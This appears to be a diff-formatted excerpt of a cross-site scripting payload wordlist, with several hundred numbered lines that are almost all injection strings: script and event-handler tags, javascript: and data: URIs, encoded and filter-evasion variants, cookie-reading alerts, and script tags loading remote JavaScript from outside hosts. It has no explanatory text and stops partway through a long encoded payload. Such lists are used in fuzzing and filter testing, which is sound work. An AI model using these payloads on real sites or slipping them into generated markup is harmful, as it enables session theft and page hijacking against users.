<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
|
|
1872
|
+
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
|
|
1873
|
+
<STYLE>@import'%(css)s';</STYLE>
|
|
1874
|
+
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
|
|
1875
|
+
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
|
|
1876
|
+
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
|
|
1877
|
+
<style onreadystatechange=javascript:javascript:alert(1);></style>
|
|
1878
|
+
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
|
|
1879
|
+
<embed code=%(scriptlet)s></embed>
|
|
1880
|
+
<embed code=javascript:javascript:alert(1);></embed>
|
|
1881
|
+
<embed src=%(jscript)s></embed>
|
|
1882
|
+
<frameset onload=javascript:javascript:alert(1)></frameset>
|
|
1883
|
+
<object onerror=javascript:javascript:alert(1)>
|
|
1884
|
+
<embed type="image" src=%(scriptlet)s></embed>
|
|
1885
|
+
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
|
|
1886
|
+
<IMG SRC=&{javascript:alert(1);};>
|
|
1887
|
+
<a href="javAascript:javascript:alert(1)">test1</a>
|
|
1888
|
+
<a href="javaascript:javascript:alert(1)">test1</a>
|
|
1889
|
+
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
|
|
1890
|
+
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">
|
|
1891
|
+
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
|
|
1892
|
+
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
|
|
1893
|
+
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
1894
|
+
'';!--"<XSS>=&{()}
|
|
1895
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
1896
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
1897
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1898
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
1899
|
+
<IMG SRC=javascript:alert("XSS")>
|
|
1900
|
+
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
|
1901
|
+
<a onmouseover="alert(document.cookie)">xxs link</a>
|
|
1902
|
+
<a onmouseover=alert(document.cookie)>xxs link</a>
|
|
1903
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
1904
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
1905
|
+
<IMG SRC=# onmouseover="alert('xxs')">
|
|
1906
|
+
<IMG SRC= onmouseover="alert('xxs')">
|
|
1907
|
+
<IMG onmouseover="alert('xxs')">
|
|
1908
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1909
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1910
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1911
|
+
<IMG SRC="jav ascript:alert('XSS');">
|
|
1912
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
|
1913
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
|
1914
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
|
1915
|
+
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
|
|
1916
|
+
<IMG SRC="  javascript:alert('XSS');">
|
|
1917
|
+
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1918
|
+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
1919
|
+
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1920
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
1921
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
|
|
1922
|
+
<SCRIPT SRC=//ha.ckers.org/.j>
|
|
1923
|
+
<IMG SRC="javascript:alert('XSS')"
|
|
1924
|
+
<iframe src=http://ha.ckers.org/scriptlet.html <
|
|
1925
|
+
\";alert('XSS');//
|
|
1926
|
+
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
|
1927
|
+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
1928
|
+
<BODY BACKGROUND="javascript:alert('XSS')">
|
|
1929
|
+
<IMG DYNSRC="javascript:alert('XSS')">
|
|
1930
|
+
<IMG LOWSRC="javascript:alert('XSS')">
|
|
1931
|
+
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
|
|
1932
|
+
<IMG SRC='vbscript:msgbox("XSS")'>
|
|
1933
|
+
<IMG SRC="livescript:[code]">
|
|
1934
|
+
<BODY ONLOAD=alert('XSS')>
|
|
1935
|
+
<BGSOUND SRC="javascript:alert('XSS');">
|
|
1936
|
+
<BR SIZE="&{alert('XSS')}">
|
|
1937
|
+
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
|
1938
|
+
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
|
1939
|
+
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
|
1940
|
+
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
|
1941
|
+
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
|
1942
|
+
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
|
1943
|
+
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
1944
|
+
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|
1945
|
+
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|
1946
|
+
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
|
1947
|
+
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
1948
|
+
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
1949
|
+
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
1950
|
+
<XSS STYLE="behavior: url(xss.htc);">
|
|
1951
|
+
¼script¾alert(¢XSS¢)¼/script¾
|
|
1952
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|
1953
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|
1954
|
+
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|
1955
|
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
1956
|
+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
|
|
1957
|
+
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|
1958
|
+
<TABLE BACKGROUND="javascript:alert('XSS')">
|
|
1959
|
+
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
|
|
1960
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
1961
|
+
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|
1962
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
1963
|
+
<DIV STYLE="width: expression(alert('XSS'));">
|
|
1964
|
+
<BASE HREF="javascript:alert('XSS');//">
|
|
1965
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
|
1966
|
+
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
|
1967
|
+
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
|
1968
|
+
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
|
1969
|
+
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
|
1970
|
+
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
|
1971
|
+
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
|
1972
|
+
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
|
1973
|
+
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
|
1974
|
+
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1975
|
+
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1976
|
+
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1977
|
+
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1978
|
+
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1979
|
+
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1980
|
+
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1981
|
+
<A HREF="http://66.102.7.147/">XSS</A>
|
|
1982
|
+
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
|
|
1983
|
+
<A HREF="http://1113982867/">XSS</A>
|
|
1984
|
+
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
|
|
1985
|
+
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
|
|
1986
|
+
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
|
|
1987
|
+
<iframe src="	javascript:prompt(1)	">
|
|
1988
|
+
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
|
|
1989
|
+
<input/onmouseover="javaSCRIPT:confirm(1)"
|
|
1990
|
+
<sVg><scRipt >alert(1) {Opera}
|
|
1991
|
+
<img/src=`` onerror=this.onerror=confirm(1)
|
|
1992
|
+
<form><isindex formaction="javascript:confirm(1)"
|
|
1993
|
+
<img src=``
 onerror=alert(1)

|
|
1994
|
+
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
|
|
1995
|
+
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
|
|
1996
|
+
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
|
|
1997
|
+
<script /**/>/**/alert(1)/**/</script /**/
|
|
1998
|
+
"><h1/onmouseover='\u0061lert(1)'>
|
|
1999
|
+
<iframe/src="data:text/html,<svg onload=alert(1)>">
|
|
2000
|
+
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
|
|
2001
|
+
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
|
|
2002
|
+
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
|
|
2003
|
+
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
|
|
2004
|
+
<iframe src=javascript:alert(document.location)>
|
|
2005
|
+
<form><a href="javascript:\u0061lert(1)">X
|
|
2006
|
+
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
|
|
2007
|
+
<img/	  src=`~` onerror=prompt(1)>
|
|
2008
|
+
<form><iframe 	  src="javascript:alert(1)" 	;>
|
|
2009
|
+
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
|
|
2010
|
+
http://www.google<script .com>alert(document.location)</script
|
|
2011
|
+
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
|
|
2012
|
+
<img/src=@  onerror = prompt('1')
|
|
2013
|
+
<style/onload=prompt('XSS')
|
|
2014
|
+
<script ^__^>alert(String.fromCharCode(49))</script ^__^
|
|
2015
|
+
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
|
|
2016
|
+
�</form><input type="date" onfocus="alert(1)">
|
|
2017
|
+
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
|
|
2018
|
+
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
|
|
2019
|
+
<iframe srcdoc='<body onload=prompt(1)>'>
|
|
2020
|
+
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
|
|
2021
|
+
<script ~~~>alert(0%0)</script ~~~>
|
|
2022
|
+
<style/onload=<!--	> alert (1)>
|
|
2023
|
+
<///style///><span %2F onmousemove='alert(1)'>SPAN
|
|
2024
|
+
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
|
|
2025
|
+
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
|
|
2026
|
+
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
|
|
2027
|
+
<marquee onstart='javascript:alert(1)'>^__^
|
|
2028
|
+
<div/style="width:expression(confirm(1))">X</div> {IE7}
|
|
2029
|
+
<iframe// src=javaSCRIPT:alert(1)
|
|
2030
|
+
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
|
|
2031
|
+
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
|
|
2032
|
+
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
|
|
2033
|
+
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
|
|
2034
|
+
<a/href="javascript: javascript:prompt(1)"><input type="X">
|
|
2035
|
+
</plaintext\></|\><plaintext/onmouseover=prompt(1)
|
|
2036
|
+
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
|
|
2037
|
+
<a href="javascript:\u0061le%72t(1)"><button>
|
|
2038
|
+
<div onmouseover='alert(1)'>DIV</div>
|
|
2039
|
+
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
|
2040
|
+
<a href="jAvAsCrIpT:alert(1)">X</a>
|
|
2041
|
+
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
2042
|
+
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
2043
|
+
<var onmouseover="prompt(1)">On Mouse Over</var>
|
|
2044
|
+
<a href=javascript:alert(document.cookie)>Click Here</a>
|
|
2045
|
+
<img src="/" =_=" title="onerror='prompt(1)'">
|
|
2046
|
+
<%<!--'%><script>alert(1);</script -->
|
|
2047
|
+
<script src="data:text/javascript,alert(1)"></script>
|
|
2048
|
+
<iframe/src \/\/onload = prompt(1)
|
|
2049
|
+
<iframe/onreadystatechange=alert(1)
|
|
2050
|
+
<svg/onload=alert(1)
|
|
2051
|
+
<input value=<><iframe/src=javascript:confirm(1)
|
|
2052
|
+
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
|
|
2053
|
+
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
|
2054
|
+
<img src=`xx:xx`onerror=alert(1)>
|
|
2055
|
+
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
|
2056
|
+
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
|
|
2057
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
2058
|
+
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
|
|
2059
|
+
<svg contentScriptType=text/vbs><script>MsgBox+1
|
|
2060
|
+
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
|
2061
|
+
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
|
2062
|
+
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
|
2063
|
+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
|
2064
|
+
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
|
|
2065
|
+
<object data=javascript:\u0061le%72t(1)>
|
|
2066
|
+
<script>+-+-1-+-+alert(1)</script>
|
|
2067
|
+
<body/onload=<!-->
alert(1)>
|
|
2068
|
+
<script itworksinallbrowsers>/*<script* */alert(1)</script
|
|
2069
|
+
<img src ?itworksonchrome?\/onerror = alert(1)
|
|
2070
|
+
<svg><script>//
confirm(1);</script </svg>
|
|
2071
|
+
<svg><script onlypossibleinopera:-)> alert(1)
|
|
2072
|
+
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
|
2073
|
+
<script x> alert(1) </script 1=2
|
|
2074
|
+
<div/onmouseover='alert(1)'> style="x:">
|
|
2075
|
+
<--`<img/src=` onerror=alert(1)> --!>
|
|
2076
|
+
<script/src=data:text/javascript,alert(1)></script>
|
|
2077
|
+
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
|
|
2078
|
+
"><img src=x onerror=window.open('https://www.google.com/');>
|
|
2079
|
+
<form><button formaction=javascript:alert(1)>CLICKME
|
|
2080
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
2081
|
+
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
|
|
2082
|
+
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
|
2083
|
+
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
|
2084
|
+
'';!--"<XSS>=&{()}
|
|
2085
|
+
'>//\\,<'>">">"*"
|
|
2086
|
+
'); alert('XSS
|
|
2087
|
+
<script>alert(1);</script>
|
|
2088
|
+
<script>alert('XSS');</script>
|
|
2089
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
2090
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
2091
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
2092
|
+
<IMG SRC=javascript:alert("XSS")>
|
|
2093
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
2094
|
+
<scr<script>ipt>alert('XSS');</scr</script>ipt>
|
|
2095
|
+
<script>alert(String.fromCharCode(88,83,83))</script>
|
|
2096
|
+
<img src=foo.png onerror=alert(/xssed/) />
|
|
2097
|
+
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
|
|
2098
|
+
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
|
|
2099
|
+
<marquee><script>alert('XSS')</script></marquee>
|
|
2100
|
+
<IMG SRC=\"jav	ascript:alert('XSS');\">
|
|
2101
|
+
<IMG SRC=\"jav
ascript:alert('XSS');\">
|
|
2102
|
+
<IMG SRC=\"jav
ascript:alert('XSS');\">
|
|
2103
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
2104
|
+
"><script>alert(0)</script>
|
|
2105
|
+
<script src=http://yoursite.com/your_files.js></script>
|
|
2106
|
+
</title><script>alert(/xss/)</script>
|
|
2107
|
+
</textarea><script>alert(/xss/)</script>
|
|
2108
|
+
<IMG LOWSRC=\"javascript:alert('XSS')\">
|
|
2109
|
+
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
|
2110
|
+
<font style='color:expression(alert(document.cookie))'>
|
|
2111
|
+
<img src="javascript:alert('XSS')">
|
|
2112
|
+
<script language="JavaScript">alert('XSS')</script>
|
|
2113
|
+
<body onunload="javascript:alert('XSS');">
|
|
2114
|
+
<body onLoad="alert('XSS');"
|
|
2115
|
+
[color=red' onmouseover="alert('xss')"]mouse over[/color]
|
|
2116
|
+
"/></a></><img src=1.gif onerror=alert(1)>
|
|
2117
|
+
window.alert("Bonjour !");
|
|
2118
|
+
<div style="x:expression((window.r==1)?'':eval('r=1;
|
|
2119
|
+
alert(String.fromCharCode(88,83,83));'))">
|
|
2120
|
+
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
|
|
2121
|
+
"><script alert(String.fromCharCode(88,83,83))</script>
|
|
2122
|
+
'>><marquee><h1>XSS</h1></marquee>
|
|
2123
|
+
'">><script>alert('XSS')</script>
|
|
2124
|
+
'">><marquee><h1>XSS</h1></marquee>
|
|
2125
|
+
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
|
|
2126
|
+
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
|
|
2127
|
+
<script>var var = 1; alert(var)</script>
|
|
2128
|
+
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
2129
|
+
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
|
|
2130
|
+
<IMG SRC='vbscript:msgbox(\"XSS\")'>
|
|
2131
|
+
" onfocus=alert(document.domain) "> <"
|
|
2132
|
+
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
|
|
2133
|
+
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
|
|
2134
|
+
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
|
|
2135
|
+
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
|
|
2136
|
+
<br size=\"&{alert('XSS')}\">
|
|
2137
|
+
<scrscriptipt>alert(1)</scrscriptipt>
|
|
2138
|
+
</br style=a:expression(alert())>
|
|
2139
|
+
</script><script>alert(1)</script>
|
|
2140
|
+
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
2141
|
+
[color=red width=expression(alert(123))][color]
|
|
2142
|
+
<BASE HREF="javascript:alert('XSS');//">
|
|
2143
|
+
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
|
|
2144
|
+
"></iframe><script>alert(123)</script>
|
|
2145
|
+
<body onLoad="while(true) alert('XSS');">
|
|
2146
|
+
'"></title><script>alert(1111)</script>
|
|
2147
|
+
</textarea>'"><script>alert(document.cookie)</script>
|
|
2148
|
+
'""><script language="JavaScript"> alert('X \nS \nS');</script>
|
|
2149
|
+
</script></script><<<<script><>>>><<<script>alert(123)</script>
|
|
2150
|
+
<html><noalert><noscript>(123)</noscript><script>(123)</script>
|
|
2151
|
+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
2152
|
+
'></select><script>alert(123)</script>
|
|
2153
|
+
'>"><script src = 'http://www.site.com/XSS.js'></script>
|
|
2154
|
+
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
|
|
2155
|
+
<SCRIPT>document.write("XSS");</SCRIPT>
|
|
2156
|
+
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
|
|
2157
|
+
='><script>alert("xss")</script>
|
|
2158
|
+
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
|
|
2159
|
+
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
|
|
2160
|
+
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
|
|
2161
|
+
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
|
|
2162
|
+
src="http://www.site.com/XSS.js"></script>
|
|
2163
|
+
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
|
|
2164
|
+
!--" /><script>alert('xss');</script>
|
|
2165
|
+
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
|
|
2166
|
+
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
|
|
2167
|
+
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
|
|
2168
|
+
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
|
|
2169
|
+
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
|
|
2170
|
+
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
|
|
2171
|
+
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
|
|
2172
|
+
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
|
|
2173
|
+
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
|
|
2174
|
+
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
|
|
2175
|
+
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
|
|
2176
|
+
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
|
|
2177
|
+
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
|
|
2178
|
+
'); alert('xss'); var x='
|
|
2179
|
+
\\'); alert(\'xss\');var x=\'
|
|
2180
|
+
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
|
|
2181
|
+
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
|
|
2182
|
+
<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047